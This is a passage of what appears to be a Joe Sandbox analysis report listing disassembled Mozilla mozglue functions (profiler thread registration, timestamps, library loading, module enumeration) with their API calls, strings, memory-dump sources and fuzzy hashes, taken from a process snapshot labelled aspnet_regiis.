                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F93A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F98A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F990
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F994
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F716
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                              • Part of subcall function 6CC2B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC2B5E0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F739
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F746
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F793
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCA385B,00000002,?,?,?,?,?), ref: 6CC6F829
                                                                                                                            • free.MOZGLUE(?,?,00000000,?), ref: 6CC6F84C
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC6F866
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6FA0C
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC35E8C
                                                                                                                              • Part of subcall function 6CC35E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35E9D
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThreadId.KERNEL32 ref: 6CC35EAB
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThreadId.KERNEL32 ref: 6CC35EB8
                                                                                                                              • Part of subcall function 6CC35E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35ECF
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC35F27
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC35F47
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentProcess.KERNEL32 ref: 6CC35F53
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThread.KERNEL32 ref: 6CC35F5C
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentProcess.KERNEL32 ref: 6CC35F66
                                                                                                                              • Part of subcall function 6CC35E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC35F7E
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6F9C5
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6F9DA
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC6F71F
                                                                                                                            • " attempted to re-register as ", xrefs: 6CC6F858
                                                                                                                            • Thread , xrefs: 6CC6F789
                                                                                                                            • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC6F9A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                            • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                            • API String ID: 882766088-1834255612
                                                                                                                            • Opcode ID: 8dffc5bbcb67c3c87b71e9a06f92683c34daaf97936ca16a1e63a439d98a97ef
                                                                                                                            • Instruction ID: 26b82ba905679986c0541af3f5ff93cd13e2361e47d03a0f232e38c6170b1d31
                                                                                                                            • Opcode Fuzzy Hash: 8dffc5bbcb67c3c87b71e9a06f92683c34daaf97936ca16a1e63a439d98a97ef
                                                                                                                            • Instruction Fuzzy Hash: C0811171A046049FDB00DF65C894BAEB7B5FF85308F44856DE84A9BB51FB30D849CBA2
                                                                                                                            Function 6CC6EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EE60
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EE6D
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EE92
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC6EEA5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC6EEB4
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC6EEBB
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EEC7
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6EECF
                                                                                                                              • Part of subcall function 6CC6DE60: GetCurrentThreadId.KERNEL32 ref: 6CC6DE73
                                                                                                                              • Part of subcall function 6CC6DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC34A68), ref: 6CC6DE7B
                                                                                                                              • Part of subcall function 6CC6DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC34A68), ref: 6CC6DEB8
                                                                                                                              • Part of subcall function 6CC6DE60: free.MOZGLUE(00000000,?,6CC34A68), ref: 6CC6DEFE
                                                                                                                              • Part of subcall function 6CC6DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC6DF38
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EF1E
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EF2B
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EF59
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EFB0
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EFBD
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EFE1
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EFF8
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F000
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC6F02F
                                                                                                                              • Part of subcall function 6CC6F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC6F09B
                                                                                                                              • Part of subcall function 6CC6F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC6F0AC
                                                                                                                              • Part of subcall function 6CC6F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC6F0BE
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_pause, xrefs: 6CC6F008
                                                                                                                            • [I %d/%d] profiler_stop, xrefs: 6CC6EED7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                            • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                            • API String ID: 16519850-1833026159
                                                                                                                            • Opcode ID: 7c4b477100c59163abf7d06f269b8fbedbcfb2906d7136136fd02edb0f938473
                                                                                                                            • Instruction ID: 5e1f44ad2b7526503d7914df36b38e588839e37c803a2712ae1ef5c18aa92f0e
                                                                                                                            • Opcode Fuzzy Hash: 7c4b477100c59163abf7d06f269b8fbedbcfb2906d7136136fd02edb0f938473
                                                                                                                            • Instruction Fuzzy Hash: 22511235A042159FDB00ABEAF95C7AD7BB4EB46328F14452AE91583F80FB314805C7E6
                                                                                                                            Function 6CC35E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35E9D
                                                                                                                              • Part of subcall function 6CC45B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC456EE,?,00000001), ref: 6CC45B85
                                                                                                                              • Part of subcall function 6CC45B50: EnterCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45B90
                                                                                                                              • Part of subcall function 6CC45B50: LeaveCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45BD8
                                                                                                                              • Part of subcall function 6CC45B50: GetTickCount64.KERNEL32 ref: 6CC45BE4
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC35EAB
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC35EB8
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35ECF
                                                                                                                            • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC36017
                                                                                                                              • Part of subcall function 6CC24310: moz_xmalloc.MOZGLUE(00000010,?,6CC242D2), ref: 6CC2436A
                                                                                                                              • Part of subcall function 6CC24310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC242D2), ref: 6CC24387
                                                                                                                            • moz_xmalloc.MOZGLUE(00000004), ref: 6CC35F47
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC35F53
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 6CC35F5C
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC35F66
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC35F7E
                                                                                                                            • moz_xmalloc.MOZGLUE(00000024), ref: 6CC35F27
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC35E8C
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC3605D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC360CC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                            • String ID: GeckoMain
                                                                                                                            • API String ID: 3711609982-966795396
                                                                                                                            • Opcode ID: 7406b329d3b6e72263801b12cff9331dff07c57994c783e22bc4e617b524c171
                                                                                                                            • Instruction ID: b76f5e3bd3adc2dc52f1a4c6fc10ff168df8b03b82ded5b0a3109d4763b9a565
                                                                                                                            • Opcode Fuzzy Hash: 7406b329d3b6e72263801b12cff9331dff07c57994c783e22bc4e617b524c171
                                                                                                                            • Instruction Fuzzy Hash: 8B71F4B0A04740CFD710DF69E484A6ABBF0FF49304F54596DE48A87B52E731E858CB92
                                                                                                                            Function 6CC39590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC231C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC23217
                                                                                                                              • Part of subcall function 6CC231C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC23236
                                                                                                                              • Part of subcall function 6CC231C0: FreeLibrary.KERNEL32 ref: 6CC2324B
                                                                                                                              • Part of subcall function 6CC231C0: __Init_thread_footer.LIBCMT ref: 6CC23260
                                                                                                                              • Part of subcall function 6CC231C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC2327F
                                                                                                                              • Part of subcall function 6CC231C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC2328E
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC232AB
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC232D1
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC232E5
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC232F7
                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC39675
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39697
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC396E8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC39707
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3971F
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39773
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC397B7
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397D0
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397EB
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39824
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 3361784254-3880535382
                                                                                                                            • Opcode ID: c9c34d7c7c939a449b6c7512bcede9ea343aec751e4f914020c00c933fa7b8d3
                                                                                                                            • Instruction ID: 6586f48d5910129f2d2737f1e6600904ac977ca2c56e7becd1abceabd6da3057
                                                                                                                            • Opcode Fuzzy Hash: c9c34d7c7c939a449b6c7512bcede9ea343aec751e4f914020c00c933fa7b8d3
                                                                                                                            • Instruction Fuzzy Hash: E961B1716002169FDF008FE9F89CB9E7BB4EB4A314F004519E95AD3B90EB30D854CBA1
                                                                                                                            Function 6CC37FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC38007
                                                                                                                            • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC3801D
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC3802B
                                                                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC3803D
                                                                                                                            • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC3808D
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC3809B
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC380B9
                                                                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC380DF
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC380ED
                                                                                                                            • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC380FB
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3810D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC38133
                                                                                                                            • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC38149
                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC38167
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC3817C
                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC38199
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2721933968-0
                                                                                                                            • Opcode ID: f3c9f95b8a6a4baea6f1aae69a8a7ed6863d9e0ac23d0dbfd0db2049badebdfd
                                                                                                                            • Instruction ID: 7e671f1e5fcac0bf7f7d18574b1c96ad2aa7594f9a6da36bb8d398d3e824cf23
                                                                                                                            • Opcode Fuzzy Hash: f3c9f95b8a6a4baea6f1aae69a8a7ed6863d9e0ac23d0dbfd0db2049badebdfd
                                                                                                                            • Instruction Fuzzy Hash: 105173B2E002149BDB00DBA9EC84EEFB7B9AF49264F145126E819E7741F7349905CBA1
                                                                                                                            Function 6CC86660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSection.KERNEL32(6CCAF618), ref: 6CC86694
                                                                                                                            • GetThreadId.KERNEL32(?), ref: 6CC866B1
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC866B9
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC866E1
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF618), ref: 6CC86734
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC8673A
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF618), ref: 6CC8676C
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 6CC867FC
                                                                                                                            • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC86868
                                                                                                                            • RtlCaptureContext.NTDLL ref: 6CC8687F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                            • String ID: WalkStack64
                                                                                                                            • API String ID: 2357170935-3499369396
                                                                                                                            • Opcode ID: 94824027caebc08d5510dad19be1ed778270aa18636fe2e79babefe14af3c4e4
                                                                                                                            • Instruction ID: 6d0bc6c9aa53f341c23b003dcaf61f20a79b92fbe471a52bf9cb84483440d816
                                                                                                                            • Opcode Fuzzy Hash: 94824027caebc08d5510dad19be1ed778270aa18636fe2e79babefe14af3c4e4
                                                                                                                            • Instruction Fuzzy Hash: 6E51BC71A1A701AFDB11CF64D848B5FBBF4BF89718F00492DF99987640E770E9048B92
                                                                                                                            Function 6CC6DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DE73
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DF7D
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6DF8A
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6DFC9
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DFF7
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6E000
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC34A68), ref: 6CC6DE7B
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC34A68), ref: 6CC6DEB8
                                                                                                                            • free.MOZGLUE(00000000,?,6CC34A68), ref: 6CC6DEFE
                                                                                                                            • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC6DF38
                                                                                                                            Strings
                                                                                                                            • <none>, xrefs: 6CC6DFD7
                                                                                                                            • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC6E00E
